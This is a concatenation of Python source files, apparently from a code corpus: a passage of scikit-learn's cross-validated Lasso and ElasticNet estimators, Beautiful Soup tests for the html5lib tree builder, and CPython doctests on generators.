else: l1_ratios = [1, ] path_params.pop('cv', None) path_params.pop('n_jobs', None) alphas = self.alphas n_l1_ratio = len(l1_ratios) if alphas is None: alphas = [] for l1_ratio in l1_ratios: alphas.append(_alpha_grid( X, y, l1_ratio=l1_ratio, fit_intercept=self.fit_intercept, eps=self.eps, n_alphas=self.n_alphas, normalize=self.normalize, copy_X=self.copy_X)) else: # Making sure alphas is properly ordered. alphas = np.tile(np.sort(alphas)[::-1], (n_l1_ratio, 1)) # We want n_alphas to be the number of alphas used for each l1_ratio. n_alphas = len(alphas[0]) path_params.update({'n_alphas': n_alphas}) path_params['copy_X'] = copy_X # We are not computing in parallel, we can modify X # inplace in the folds if not (self.n_jobs == 1 or self.n_jobs is None): path_params['copy_X'] = False # init cross-validation generator cv = check_cv(self.cv, X) # Compute path for all folds and compute MSE to get the best alpha folds = list(cv) best_mse = np.inf # We do a double for loop folded in one, in order to be able to # iterate in parallel on l1_ratio and folds jobs = (delayed(_path_residuals)(X, y, train, test, self.path, path_params, alphas=this_alphas, l1_ratio=this_l1_ratio, X_order='F', dtype=np.float64) for this_l1_ratio, this_alphas in zip(l1_ratios, alphas) for train, test in folds) mse_paths = Parallel(n_jobs=self.n_jobs, verbose=self.verbose, backend="threading")(jobs) mse_paths = np.reshape(mse_paths, (n_l1_ratio, len(folds), -1)) mean_mse = np.mean(mse_paths, axis=1) self.mse_path_ = np.squeeze(np.rollaxis(mse_paths, 2, 1)) for l1_ratio, l1_alphas, mse_alphas in zip(l1_ratios, alphas, mean_mse): i_best_alpha = np.argmin(mse_alphas) this_best_mse = mse_alphas[i_best_alpha] if this_best_mse < best_mse: best_alpha = l1_alphas[i_best_alpha] best_l1_ratio = l1_ratio best_mse = this_best_mse self.l1_ratio_ = best_l1_ratio self.alpha_ = best_alpha if self.alphas is None: self.alphas_ = np.asarray(alphas) if n_l1_ratio == 1: self.alphas_ = self.alphas_[0] # Remove duplicate alphas in case alphas is provided. else: self.alphas_ = np.asarray(alphas[0]) # Refit the model with the parameters selected common_params = dict((name, value) for name, value in self.get_params().items() if name in model.get_params()) model.set_params(**common_params) model.alpha = best_alpha model.l1_ratio = best_l1_ratio model.copy_X = copy_X model.precompute = False model.fit(X, y) if not hasattr(self, 'l1_ratio'): del self.l1_ratio_ self.coef_ = model.coef_ self.intercept_ = model.intercept_ self.dual_gap_ = model.dual_gap_ self.n_iter_ = model.n_iter_ return self class LassoCV(LinearModelCV, RegressorMixin): """Lasso linear model with iterative fitting along a regularization path The best model is selected by cross-validation. The optimization objective for Lasso is:: (1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1 Parameters ---------- eps : float, optional Length of the path. ``eps=1e-3`` means that ``alpha_min / alpha_max = 1e-3``. n_alphas : int, optional Number of alphas along the regularization path alphas : numpy array, optional List of alphas where to compute the models. If ``None`` alphas are set automatically precompute : True | False | 'auto' | array-like Whether to use a precomputed Gram matrix to speed up calculations. If set to ``'auto'`` let us decide. The Gram matrix can also be passed as argument. max_iter : int, optional The maximum number of iterations tol : float, optional The tolerance for the optimization: if the updates are smaller than ``tol``, the optimization code checks the dual gap for optimality and continues until it is smaller than ``tol``. cv : integer or cross-validation generator, optional If an integer is passed, it is the number of fold (default 3). Specific cross-validation objects can be passed, see the :mod:`sklearn.cross_validation` module for the list of possible objects. verbose : bool or integer Amount of verbosity. n_jobs : integer, optional Number of CPUs to use during the cross validation. If ``-1``, use all the CPUs. positive : bool, optional If positive, restrict regression coefficients to be positive selection : str, default 'cyclic' If set to 'random', a random coefficient is updated every iteration rather than looping over features sequentially by default. This (setting to 'random') often leads to significantly faster convergence especially when tol is higher than 1e-4. random_state : int, RandomState instance, or None (default) The seed of the pseudo random number generator that selects a random feature to update. Useful only when selection is set to 'random'. fit_intercept : boolean, default True whether to calculate the intercept for this model. If set to false, no intercept will be used in calculations (e.g. data is expected to be already centered). normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. Attributes ---------- alpha_ : float The amount of penalization chosen by cross validation coef_ : array, shape = (n_features,) | (n_targets, n_features) parameter vector (w in the cost function formula) intercept_ : float | array, shape = (n_targets,) independent term in decision function. mse_path_ : array, shape = (n_alphas, n_folds) mean square error for the test set on each fold, varying alpha alphas_ : numpy array, shape = (n_alphas,) The grid of alphas used for fitting dual_gap_ : ndarray, shape () The dual gap at the end of the optimization for the optimal alpha (``alpha_``). n_iter_ : int number of iterations run by the coordinate descent solver to reach the specified tolerance for the optimal alpha. Notes ----- See examples/linear_model/lasso_path_with_crossvalidation.py for an example. To avoid unnecessary memory duplication the X argument of the fit method should be directly passed as a Fortran-contiguous numpy array. See also -------- lars_path lasso_path LassoLars Lasso LassoLarsCV """ path = staticmethod(lasso_path) def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True, normalize=False, precompute='auto', max_iter=1000, tol=1e-4, copy_X=True, cv=None, verbose=False, n_jobs=1, positive=False, random_state=None, selection='cyclic'): super(LassoCV, self).__init__( eps=eps, n_alphas=n_alphas, alphas=alphas, fit_intercept=fit_intercept, normalize=normalize, precompute=precompute, max_iter=max_iter, tol=tol, copy_X=copy_X, cv=cv, verbose=verbose, n_jobs=n_jobs, positive=positive, random_state=random_state, selection=selection) class ElasticNetCV(LinearModelCV, RegressorMixin): """Elastic Net model with iterative fitting along a regularization path The best model is selected by cross-validation. Parameters ---------- l1_ratio : float, optional float between 0 and 1 passed to ElasticNet (scaling between l1 and l2 penalties). For ``l1_ratio = 0`` the penalty is an L2 penalty. For ``l1_ratio = 1`` it is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2 This parameter can be a list, in which case the different values are tested by cross-validation and the one giving the best prediction score is used. Note that a good choice of list of values for l1_ratio is often to put more values close to 1 (i.e. Lasso) and less close to 0 (i.e. Ridge), as in ``[.1, .5, .7, .9, .95, .99, 1]`` eps : float, optional Length of the path. ``eps=1e-3`` means that ``alpha_min / alpha_max = 1e-3``. n_alphas : int, optional Number of alphas along the regularization path, used for each l1_ratio. alphas : numpy array, optional List of alphas where to compute the models. If None alphas are set automatically precompute : True | False | 'auto' | array-like Whether to use a precomputed Gram matrix to speed up calculations. If set to ``'auto'`` let us decide. The Gram matrix can also be passed as argument. max_iter : int, optional The maximum number of iterations tol : float, optional The tolerance for the optimization: if the updates are smaller than ``tol``, the optimization code checks the dual gap for optimality and continues until it is smaller than ``tol``. cv : integer or cross-validation generator, optional If an integer is passed, it is the number of fold (default 3). Specific cross-validation objects can be passed, see the :mod:`sklearn.cross_validation` module for the list of possible objects. verbose : bool or integer Amount of verbosity. n_jobs : integer, optional Number of CPUs to use during the cross validation. If ``-1``, use all the CPUs. positive : bool, optional When set to ``True``, forces the coefficients to be positive. selection : str, default 'cyclic' If set to 'random', a random coefficient is updated every iteration rather than looping over features sequentially by default. This (setting to 'random') often leads to significantly faster convergence especially when tol is higher than 1e-4. random_state : int, RandomState instance, or None (default) The seed of the pseudo random number generator that selects a random feature to update. Useful only when selection is set to 'random'. fit_intercept : boolean whether to calculate the intercept for this model. If set to false, no intercept will be used in calculations (e.g. data is expected to be already centered). normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. Attributes ---------- alpha_ : float The amount of penalization chosen by cross validation l1_ratio_ : float The compromise between l1 and l2 penalization chosen by cross validation coef_ : array, shape = (n_features,) | (n_targets, n_features) Parameter vector (w in the cost function formula), intercept_ : float | array, shape = (n_targets, n_features) Independent term in the decision function. mse_path_ : array, shape = (n_l1_ratio, n_alpha, n_folds) Mean square error for the test set on each fold, varying l1_ratio and alpha. alphas_ : numpy array, shape = (n_alphas,) or (n_l1_ratio, n_alphas) The grid of alphas used for fitting, for each l1_ratio. n_iter_ : int number of iterations run by the coordinate descent solver to reach the specified tolerance for the optimal alpha. Notes ----- See examples/linear_model/lasso_path_with_crossvalidation.py for an example. To avoid unnecessary memory duplication the X argument of the fit method should be directly passed as a Fortran-contiguous numpy array. The parameter l1_ratio corresponds to alpha in the glmnet R package while alpha corresponds to the lambda parameter in glmnet. More specifically, the optimization objective is:: 1 / (2 * n_samples) * ||y - Xw||^2_2 + + alpha * l1_ratio * ||w||_1 + 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2 If you are interested in controlling the L1 and L2 penalty separately, keep in mind that this is equivalent to:: a * L1 + b * L2 for:: alpha = a + b and l1_ratio = a / (a + b). See also -------- enet_path ElasticNet """ path = staticmethod(enet_path) def __init__(self, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True, normalize=False, precompute='auto', max_iter=1000, tol=1e-4, cv=None, copy_X=True, verbose=0, n_jobs=1, positive=False, random_state=None, selection='cyclic'): self.l1_ratio = l1_ratio self.eps = eps self.n_alphas = n_alphas self.alphas = alphas self.fit_intercept = fit_intercept self.normalize = normalize self.precompute = precompute self.max_iter = max_iter self.tol = tol self.cv = cv self.copy_X = copy_X self.verbose = verbose self.n_jobs = n_jobs self.positive = positive self.random_state = random_state self.selection = selection ############################################################################### # Multi Task ElasticNet and Lasso models (with joint feature selection) class MultiTaskElasticNet(Lasso): """Multi-task ElasticNet model trained with L1/L2 mixed-norm as regularizer The optimization objective for MultiTaskElasticNet is:: (1 / (2 * n_samples)) * ||Y - XW||^Fro_2 + alpha * l1_ratio * ||W||_21 + 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2 Where:: ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2} i.e. the sum of norm of each row. Parameters ---------- alpha : float, optional Constant that multiplies the L1/L2 term. Defaults to 1.0 l1_ratio : float The ElasticNet mixing parameter, with 0 < l1_ratio <= 1. For l1_ratio = 0 the penalty is an L1/L2 penalty. For l1_ratio = 1 it is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a combination of L1/L2 and L2. fit_intercept : boolean whether to calculate the intercept for this model. If set to false, no intercept will be used in calculations (e.g. data is expected to be already centered). normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. max_iter : int, optional The maximum number of iterations tol : float, optional The tolerance for the optimization: if the updates are smaller than ``tol``, the optimization code checks the dual gap for optimality and continues until it is smaller than ``tol``. warm_start : bool, optional When set to ``True``, reuse the solution of the previous call to fit as initialization, otherwise, just erase the previous solution. selection : str, default 'cyclic' If set to 'random', a random coefficient is updated every iteration rather than looping over features sequentially by default. This (setting to 'random') often leads to significantly faster convergence especially when tol is higher than 1e-4. random_state : int, RandomState instance, or None (default) The seed of the pseudo random number generator that selects a random feature to update. Useful only when selection is set to 'random'. Attributes ---------- intercept_ : array, shape = (n_tasks,) Independent term in decision function. coef_ : array, shape = (n_tasks, n_features) Parameter vector (W in the cost function formula). If a 1D y is \ passed in at fit (non multi-task usage), ``coef_`` is then a 1D array n_iter_ : int number of iterations run by the coordinate descent solver to reach the specified tolerance. Examples -------- >>> from sklearn import linear_model >>> clf = linear_model.MultiTaskElasticNet(alpha=0.1) >>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]]) ... #doctest: +NORMALIZE_WHITESPACE MultiTaskElasticNet(alpha=0.1, copy_X=True, fit_intercept=True, l1_ratio=0.5, max_iter=1000, normalize=False, random_state=None, selection='cyclic', tol=0.0001, warm_start=False) >>> print(clf.coef_) [[ 0.45663524 0.45612256] [ 0.45663524 0.45612256]] >>> print(clf.intercept_) [ 0.0872422 0.0872422] See also -------- ElasticNet, MultiTaskLasso Notes ----- The algorithm used to fit the model is coordinate descent. To avoid unnecessary memory duplication the X argument of the fit method should be directly passed as a Fortran-contiguous numpy array. """ def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True, normalize=False, copy_X=True, max_iter=1000, tol=1e-4, warm_start=False, random_state=None, selection='cyclic'): self.l1_ratio = l1_ratio self.alpha = alpha self.coef_ = None self.fit_intercept = fit_intercept self.normalize = normalize self.max_iter = max_iter self.copy_X = copy_X self.tol = tol self.warm_start = warm_start self.random_state = random_state self.selection = selection def fit(self, X, y): """Fit MultiTaskLasso model with coordinate descent Parameters ----------- X : ndarray, shape = (n_samples, n_features) Data y : ndarray, shape = (n_samples, n_tasks) Target Notes ----- Coordinate descent is an algorithm that considers each column of data at a time hence it will automatically convert the X input as a Fortran-contiguous numpy array if necessary. To avoid memory re-allocation it is advised to allocate the initial data in memory directly using that format. """ # X and y must be of type float64 X = check_array(X, dtype=np.float64, order='F', copy=self.copy_X and self.fit_intercept) y = np.asarray(y, dtype=np.float64) if hasattr(self, 'l1_ratio'): model_str = 'ElasticNet' else: model_str = 'Lasso' if y.ndim == 1: raise ValueError("For mono-task outputs, use %s" % model_str) n_samples, n_features = X.shape _, n_tasks = y.shape if n_samples != y.shape[0]: raise ValueError("X and y have inconsistent dimensions (%d != %d)" % (n_samples, y.shape[0])) X, y, X_mean, y_mean, X_std = center_data( X, y, self.fit_intercept, self.normalize, copy=False) if not self.warm_start or self.coef_ is None: self.coef_ = np.zeros((n_tasks, n_features), dtype=np.float64, order='F') l1_reg = self.alpha * self.l1_ratio * n_samples l2_reg = self.alpha * (1.0 - self.l1_ratio) * n_samples self.coef_ = np.asfortranarray(self.coef_) # coef contiguous in memory if self.selection not in ['random', 'cyclic']: raise ValueError("selection should be either random or cyclic.") random = (self.selection == 'random') self.coef_, self.dual_gap_, self.eps_, self.n_iter_ = \ cd_fast.enet_coordinate_descent_multi_task( self.coef_, l1_reg, l2_reg, X, y, self.max_iter, self.tol, check_random_state(self.random_state), random) self._set_intercept(X_mean, y_mean, X_std) if self.dual_gap_ > self.eps_: warnings.warn('Objective did not converge, you might want' ' to increase the number of iterations') # return self for chaining fit and predict calls return self class MultiTaskLasso(MultiTaskElasticNet): """Multi-task Lasso model trained with L1/L2 mixed-norm as regularizer The optimization objective for Lasso is:: (1 / (2 * n_samples)) * ||Y - XW||^2_Fro + alpha * ||W||_21 Where:: ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2} i.e. the sum of norm of earch row. Parameters ---------- alpha : float, optional Constant that multiplies the L1/L2 term. Defaults to 1.0 fit_intercept : boolean whether to calculate the intercept for this model. If set to false, no intercept will be used in calculations (e.g. data is expected to be already centered). normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. max_iter : int, optional The maximum number of iterations tol : float, optional The tolerance for the optimization: if the updates are smaller than ``tol``, the optimization code checks the dual gap for optimality and continues until it is smaller than ``tol``. warm_start : bool, optional When set to ``True``, reuse the solution of the previous call to fit as initialization, otherwise, just erase the previous solution. selection : str, default 'cyclic' If set to 'random', a random coefficient is updated every iteration rather than looping over features sequentially by default. This (setting to 'random') often leads to significantly faster convergence especially when tol is higher than 1e-4 random_state : int, RandomState instance, or None (default) The seed of the pseudo random number generator that selects a random feature to update. Useful only when selection is set to 'random'. Attributes ---------- coef_ : array, shape = (n_tasks, n_features) parameter vector (W in the cost function formula) intercept_ : array, shape = (n_tasks,) independent term in decision function. n_iter_ : int number of iterations run by the coordinate descent solver to reach the specified tolerance. Examples -------- >>> from sklearn import linear_model >>> clf = linear_model.MultiTaskLasso(alpha=0.1) >>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]]) MultiTaskLasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000, normalize=False, random_state=None, selection='cyclic', tol=0.0001, warm_start=False) >>> print(clf.coef_) [[ 0.89393398 0. ] [ 0.89393398 0. ]] >>> print(clf.intercept_) [ 0.10606602 0.10606602] See also -------- Lasso, MultiTaskElasticNet Notes ----- The algorithm used to fit the model is coordinate descent. To avoid unnecessary memory duplication the X argument of the fit method should be directly passed as a Fortran-contiguous numpy array. """ def __init__(self, alpha=1.0, fit_intercept=True, normalize=False, copy_X=True, max_iter=1000, tol=1e-4, warm_start=False, random_state=None, selection='cyclic'): self.alpha = alpha self.coef_ = None self.fit_intercept = fit_intercept self.normalize = normalize self.max_iter = max_iter self.copy_X = copy_X self.tol = tol self.warm_start = warm_start self.l1_ratio = 1.0 self.random_state = random_state self.selection = selection class MultiTaskElasticNetCV(LinearModelCV, RegressorMixin): """Multi-task L1/L2 ElasticNet with built-in cross-validation. The optimization objective for MultiTaskElasticNet is:: (1 / (2 * n_samples)) * ||Y - XW||^Fro_2 + alpha * l1_ratio * ||W||_21 + 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2 Where:: ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2} i.e. the sum of norm of each row. Parameters ---------- eps : float, optional Length of the path. ``eps=1e-3`` means that ``alpha_min / alpha_max = 1e-3``. alphas : array-like, optional List of alphas where to compute the models. If not provided, set automatically. n_alphas : int, optional Number of alphas along the regularization path l1_ratio : float or array of floats The ElasticNet mixing parameter, with 0 < l1_ratio <= 1. For l1_ratio = 0 the penalty is an L1/L2 penalty. For l1_ratio = 1 it is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a combination of L1/L2 and L2. fit_intercept : boolean whether to calculate the intercept for this model. If set to false, no intercept will be used in calculations (e.g. data is expected to be already centered). normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. max_iter : int, optional The maximum number of iterations tol : float, optional The tolerance for the optimization: if the updates are smaller than ``tol``, the optimization code checks the dual gap for optimality and continues until it is smaller than ``tol``. cv : integer or cross-validation generator, optional If an integer is passed, it is the number of fold (default 3). Specific cross-validation objects can be passed, see the :mod:`sklearn.cross_validation` module for the list of possible objects. verbose : bool or integer Amount of verbosity. n_jobs : integer, optional Number of CPUs to use during the cross validation. If ``-1``, use all the CPUs. Note that this is used only if multiple values for l1_ratio are given. selection : str, default 'cyclic' If set to 'random', a random coefficient is updated every iteration rather than looping over features sequentially by default. This (setting to 'random') often leads to significantly faster convergence especially when tol is higher than 1e-4. random_state : int, RandomState instance, or None (default) The seed of the pseudo random number generator that selects a random feature to update. Useful only when selection is set to 'random'. Attributes ---------- intercept_ : array, shape (n_tasks,) Independent term in decision function. coef_ : array, shape (n_tasks, n_features) Parameter vector (W in the cost function formula). alpha_ : float The amount of penalization chosen by cross validation mse_path_ : array, shape (n_alphas, n_folds) or (n_l1_ratio, n_alphas, n_folds) mean square error for the test set on each fold, varying alpha alphas_ : numpy array, shape (n_alphas,) or (n_l1_ratio, n_alphas) The grid of alphas used for fitting, for each l1_ratio l1_ratio_ : float best l1_ratio obtained by cross-validation. n_iter_ : int number of iterations run by the coordinate descent solver to reach the specified tolerance for the optimal alpha. Examples -------- >>> from sklearn import linear_model >>> clf = linear_model.MultiTaskElasticNetCV() >>> clf.fit([[0,0], [1, 1], [2, 2]], ... [[0, 0], [1, 1], [2, 2]]) ... #doctest: +NORMALIZE_WHITESPACE MultiTaskElasticNetCV(alphas=None, copy_X=True, cv=None, eps=0.001, fit_intercept=True, l1_ratio=0.5, max_iter=1000, n_alphas=100, n_jobs=1, normalize=False, random_state=None, selection='cyclic', tol=0.0001, verbose=0) >>> print(clf.coef_) [[ 0.52875032 0.46958558] [ 0.52875032 0.46958558]] >>> print(clf.intercept_) [ 0.00166409 0.00166409] See also -------- MultiTaskElasticNet ElasticNetCV MultiTaskLassoCV Notes ----- The algorithm used to fit the model is coordinate descent. To avoid unnecessary memory duplication the X argument of the fit method should be directly passed as a Fortran-contiguous numpy array. """ path = staticmethod(enet_path) def __init__(self, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True, normalize=False, max_iter=1000, tol=1e-4, cv=None, copy_X=True, verbose=0, n_jobs=1, random_state=None, selection='cyclic'): self.l1_ratio = l1_ratio self.eps = eps self.n_alphas = n_alphas self.alphas = alphas self.fit_intercept = fit_intercept self.normalize = normalize self.max_iter = max_iter self.tol = tol self.cv = cv self.copy_X = copy_X self.verbose = verbose self.n_jobs = n_jobs self.random_state = random_state self.selection = selection class MultiTaskLassoCV(LinearModelCV, RegressorMixin): """Multi-task L1/L2 Lasso with built-in cross-validation. The optimization objective for MultiTaskLasso is:: (1 / (2 * n_samples)) * ||Y - XW||^Fro_2 + alpha * ||W||_21 Where:: ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2} i.e. the sum of norm of each row. Parameters ---------- eps : float, optional Length of the path. ``eps=1e-3`` means that ``alpha_min / alpha_max = 1e-3``. alphas : array-like, optional List of alphas where to compute the models. If not provided, set automaticlly. n_alphas : int, optional Number of alphas along the regularization path fit_intercept : boolean whether to calculate the intercept for this model. If set to false, no intercept will be used in calculations (e.g. data is expected to be already centered). normalize : boolean, optional, default False If ``True``, the regressors X will be normalized before regression. copy_X : boolean, optional, default True If ``True``, X will be copied; else, it may be overwritten. max_iter : int, optional The maximum number of iterations. tol : float, optional The tolerance for the optimization: if the updates are smaller than ``tol``, the optimization code checks the dual gap for optimality and continues until it is smaller than ``tol``. cv : integer or cross-validation generator, optional If an integer is passed, it is the number of fold (default 3). Specific cross-validation objects can be passed, see the :mod:`sklearn.cross_validation` module for the list of possible objects. verbose : bool or integer Amount of verbosity. n_jobs : integer, optional Number of CPUs to use during the cross validation. If ``-1``, use all the CPUs. Note that this is used only if multiple values for l1_ratio are given. selection : str, default 'cyclic' If set to 'random', a random coefficient is updated every iteration rather than looping over features sequentially by default. This (setting to 'random') often leads to significantly faster convergence especially when tol is higher than 1e-4. random_state : int, RandomState instance, or None (default) The seed of the pseudo random number generator that selects a random feature to update. Useful only when selection is set to 'random'. Attributes ---------- intercept_ : array, shape (n_tasks,) Independent term in decision function. coef_ : array, shape (n_tasks, n_features) Parameter vector (W in the cost function formula). alpha_ : float The amount of penalization chosen by cross validation mse_path_ : array, shape (n_alphas, n_folds) mean square error for the test set on each fold, varying alpha alphas_ : numpy array, shape (n_alphas,) The grid of alphas used for fitting. n_iter_ : int number of iterations run by the coordinate descent solver to reach the specified tolerance for the optimal alpha. See also -------- MultiTaskElasticNet ElasticNetCV MultiTaskElasticNetCV Notes ----- The algorithm used to fit the model is coordinate descent. To avoid unnecessary memory duplication the X argument of the fit method should be directly passed as a Fortran-contiguous numpy array. """ path = staticmethod(lasso_path) def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True, normalize=False, max_iter=1000, tol=1e-4, copy_X=True, cv=None, verbose=False, n_jobs=1, random_state=None, selection='cyclic'): super(MultiTaskLassoCV, self).__init__( eps=eps, n_alphas=n_alphas, alphas=alphas, fit_intercept=fit_intercept, normalize=normalize, max_iter=max_iter, tol=tol, copy_X=copy_X, cv=cv, verbose=verbose, n_jobs=n_jobs, random_state=random_state, selection=selection)
roderickvd/nzbToMedia
refs/heads/master
libs/bs4/tests/test_html5lib.py
293
"""Tests to ensure that the html5lib tree builder generates good trees.""" import warnings try: from bs4.builder import HTML5TreeBuilder HTML5LIB_PRESENT = True except ImportError, e: HTML5LIB_PRESENT = False from bs4.element import SoupStrainer from bs4.testing import ( HTML5TreeBuilderSmokeTest, SoupTest, skipIf, ) @skipIf( not HTML5LIB_PRESENT, "html5lib seems not to be present, not testing its tree builder.") class HTML5LibBuilderSmokeTest(SoupTest, HTML5TreeBuilderSmokeTest): """See ``HTML5TreeBuilderSmokeTest``.""" @property def default_builder(self): return HTML5TreeBuilder() def test_soupstrainer(self): # The html5lib tree builder does not support SoupStrainers. strainer = SoupStrainer("b") markup = "<p>A <b>bold</b> statement.</p>" with warnings.catch_warnings(record=True) as w: soup = self.soup(markup, parse_only=strainer) self.assertEqual( soup.decode(), self.document_for(markup)) self.assertTrue( "the html5lib tree builder doesn't support parse_only" in str(w[0].message)) def test_correctly_nested_tables(self): """html5lib inserts <tbody> tags where other parsers don't.""" markup = ('<table id="1">' '<tr>' "<td>Here's another table:" '<table id="2">' '<tr><td>foo</td></tr>' '</table></td>') self.assertSoupEquals( markup, '<table id="1"><tbody><tr><td>Here\'s another table:' '<table id="2"><tbody><tr><td>foo</td></tr></tbody></table>' '</td></tr></tbody></table>') self.assertSoupEquals( "<table><thead><tr><td>Foo</td></tr></thead>" "<tbody><tr><td>Bar</td></tr></tbody>" "<tfoot><tr><td>Baz</td></tr></tfoot></table>") def test_xml_declaration_followed_by_doctype(self): markup = '''<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html> <html> <head> </head> <body> <p>foo</p> </body> </html>''' soup = self.soup(markup) # Verify that we can reach the <p> tag; this means the tree is connected. self.assertEqual(b"<p>foo</p>", soup.p.encode()) def test_reparented_markup(self): markup = '<p><em>foo</p>\n<p>bar<a></a></em></p>' soup = self.soup(markup) self.assertEqual(u"<body><p><em>foo</em></p><em>\n</em><p><em>bar<a></a></em></p></body>", soup.body.decode()) self.assertEqual(2, len(soup.find_all('p'))) def test_reparented_markup_ends_with_whitespace(self): markup = '<p><em>foo</p>\n<p>bar<a></a></em></p>\n' soup = self.soup(markup) self.assertEqual(u"<body><p><em>foo</em></p><em>\n</em><p><em>bar<a></a></em></p>\n</body>", soup.body.decode()) self.assertEqual(2, len(soup.find_all('p')))
kanagasabapathi/python-for-android
refs/heads/master
python3-alpha/python3-src/Lib/test/test_generators.py
49
tutorial_tests = """ Let's try a simple generator: >>> def f(): ... yield 1 ... yield 2 >>> for i in f(): ... print(i) 1 2 >>> g = f() >>> next(g) 1 >>> next(g) 2 "Falling off the end" stops the generator: >>> next(g) Traceback (most recent call last): File "<stdin>", line 1, in ? File "<stdin>", line 2, in g StopIteration "return" also stops the generator: >>> def f(): ... yield 1 ... return ... yield 2 # never reached ... >>> g = f() >>> next(g) 1 >>> next(g) Traceback (most recent call last): File "<stdin>", line 1, in ? File "<stdin>", line 3, in f StopIteration >>> next(g) # once stopped, can't be resumed Traceback (most recent call last): File "<stdin>", line 1, in ? StopIteration "raise StopIteration" stops the generator too: >>> def f(): ... yield 1 ... raise StopIteration ... yield 2 # never reached ... >>> g = f() >>> next(g) 1 >>> next(g) Traceback (most recent call last): File "<stdin>", line 1, in ? StopIteration >>> next(g) Traceback (most recent call last): File "<stdin>", line 1, in ? StopIteration However, they are not exactly equivalent: >>> def g1(): ... try: ... return ... except: ... yield 1 ... >>> list(g1()) [] >>> def g2(): ... try: ... raise StopIteration ... except: ... yield 42 >>> print(list(g2())) [42] This may be surprising at first: >>> def g3(): ... try: ... return ... finally: ... yield 1 ... >>> list(g3()) [1] Let's create an alternate range() function implemented as a generator: >>> def yrange(n): ... for i in range(n): ... yield i ... >>> list(yrange(5)) [0, 1, 2, 3, 4] Generators always return to the most recent caller: >>> def creator(): ... r = yrange(5) ... print("creator", next(r)) ... return r ... >>> def caller(): ... r = creator() ... for i in r: ... print("caller", i) ... >>> caller() creator 0 caller 1 caller 2 caller 3 caller 4 Generators can call other generators: >>> def zrange(n): ... for i in yrange(n): ... yield i ... >>> list(zrange(5)) [0, 1, 2, 3, 4] """ # The examples from PEP 255. pep_tests = """ Specification: Yield Restriction: A generator cannot be resumed while it is actively running: >>> def g(): ... i = next(me) ... yield i >>> me = g() >>> next(me) Traceback (most recent call last): ... File "<string>", line 2, in g ValueError: generator already executing Specification: Return Note that return isn't always equivalent to raising StopIteration: the difference lies in how enclosing try/except constructs are treated. For example, >>> def f1(): ... try: ... return ... except: ... yield 1 >>> print(list(f1())) [] because, as in any function, return simply exits, but >>> def f2(): ... try: ... raise StopIteration ... except: ... yield 42 >>> print(list(f2())) [42] because StopIteration is captured by a bare "except", as is any exception. Specification: Generators and Exception Propagation >>> def f(): ... return 1//0 >>> def g(): ... yield f() # the zero division exception propagates ... yield 42 # and we'll never get here >>> k = g() >>> next(k) Traceback (most recent call last): File "<stdin>", line 1, in ? File "<stdin>", line 2, in g File "<stdin>", line 2, in f ZeroDivisionError: integer division or modulo by zero >>> next(k) # and the generator cannot be resumed Traceback (most recent call last): File "<stdin>", line 1, in ? StopIteration >>> Specification: Try/Except/Finally >>> def f(): ... try: ... yield 1 ... try: ... yield 2 ... 1//0 ... yield 3 # never get here ... except ZeroDivisionError: ... yield 4 ... yield 5 ... raise ... except: ... yield 6 ... yield 7 # the "raise" above stops this ... except: ... yield 8 ... yield 9 ... try: ... x = 12 ... finally: ... yield 10 ... yield 11 >>> print(list(f())) [1, 2, 4, 5, 8, 9, 10, 11] >>> Guido's binary tree example. >>> # A binary tree class. >>> class Tree: ... ... def __init__(self, label, left=None, right=None): ... self.label = label ... self.left = left ... self.right = right ... ... def __repr__(self, level=0, indent=" "): ... s = level*indent + repr(self.label) ... if self.left: ... s = s + "\\n" + self.left.__repr__(level+1, indent) ... if self.right: ... s = s + "\\n" + self.right.__repr__(level+1, indent) ... return s ... ... def __iter__(self): ... return inorder(self) >>> # Create a Tree from a list. >>> def tree(list): ... n = len(list) ... if n == 0: ... return [] ... i = n // 2 ... return Tree(list[i], tree(list[:i]), tree(list[i+1:])) >>> # Show it off: create a tree. >>> t = tree("ABCDEFGHIJKLMNOPQRSTUVWXYZ") >>> # A recursive generator that generates Tree labels in in-order. >>> def inorder(t): ... if t: ... for x in inorder(t.left): ... yield x ... yield t.label ... for x in inorder(t.right): ... yield x >>> # Show it off: create a tree. >>> t = tree("ABCDEFGHIJKLMNOPQRSTUVWXYZ") >>> # Print the nodes of the tree in in-order. >>> for x in t: ... print(' '+x, end='') A B C D E F G H I J K L M N O P Q R S T U V W X Y Z >>> # A non-recursive generator. >>> def inorder(node): ... stack = [] ... while node: ... while node.left: ... stack.append(node) ... node = node.left ... yield node.label ... while not node.right: ... try: ... node = stack.pop() ... except IndexError: ... return ... yield node.label ... node = node.right >>> # Exercise the non-recursive generator. >>> for x in t: ... print(' '+x, end='') A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 